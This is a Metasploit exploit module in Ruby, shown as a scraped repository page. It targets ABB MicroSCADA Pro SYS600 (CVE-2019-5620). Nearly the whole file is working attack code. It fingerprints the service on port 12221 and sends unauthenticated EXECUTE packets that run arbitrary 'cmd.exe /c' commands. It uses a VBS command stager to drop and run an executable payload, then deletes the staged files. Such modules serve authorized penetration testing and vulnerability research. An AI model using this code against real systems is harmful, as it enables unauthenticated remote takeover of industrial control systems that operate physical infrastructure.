Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',16'Description' => %q{17This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The18issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe19component, which allows arbitrary commands. The component is disabled by default, but20required when a project uses the SCIL function WORKSTATION_CALL.2122This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on23Windows XP SP3 and Windows 7 SP1.24},25'License' => MSF_LICENSE,26'Author' => [27'Brian Gorenc', # Original discovery28'juan vazquez' # Metasploit module29],30'References' => [31[ 'CVE', '2019-5620' ],32[ 'OSVDB', '100324'],33[ 'ZDI', '13-270' ],34[ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']35],36'Platform' => 'win',37'Arch' => ARCH_X86,38'DefaultOptions' => {39'WfsDelay' => 540},41'Targets' => [42[ 'ABB MicroSCADA Pro SYS600 9.3', {} ]43],44'CmdStagerFlavor' => 'vbs',45'DefaultTarget' => 0,46'Privileged' => false,47'DisclosureDate' => '2013-04-05',48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)5556register_options([Opt::RPORT(12221)])57end5859def check60# Send an EXECUTE packet without command, a valid response61# should include an error code, which is good enough to62# fingerprint.63op = "EXECUTE\x00"64pkt_length = [4 + op.length].pack("V") # 4 because of the packet length65pkt = pkt_length66pkt << op6768connect69sock.put(pkt)70res = sock.get_once71disconnect7273if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe1000174return Exploit::CheckCode::Vulnerable75end7677return Exploit::CheckCode::Safe78end7980def exploit81# More then 750 will trigger overflow...82# Cleaning is done by the exploit on execute_cmdstager_end83execute_cmdstager({ :linemax => 750, :nodelete => true })84end8586def execute_cmdstager_end(opts)87@var_tempdir = @stager_instance.instance_variable_get(:@tempdir)88@var_decoded = @stager_instance.instance_variable_get(:@var_decoded)89@var_encoded = @stager_instance.instance_variable_get(:@var_encoded)90@var_decoder = @stager_instance.instance_variable_get(:@var_decoder)91print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")92execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})93print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")94execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})95print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")96execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})97end9899def execute_command(cmd, opts)100op = "EXECUTE\x00"101command = "cmd.exe /c #{cmd}"102pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length103104pkt = pkt_length105pkt << op106pkt << command107108connect109sock.put(pkt)110res = sock.get_once111disconnect112113unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1114fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")115end116end117end118119120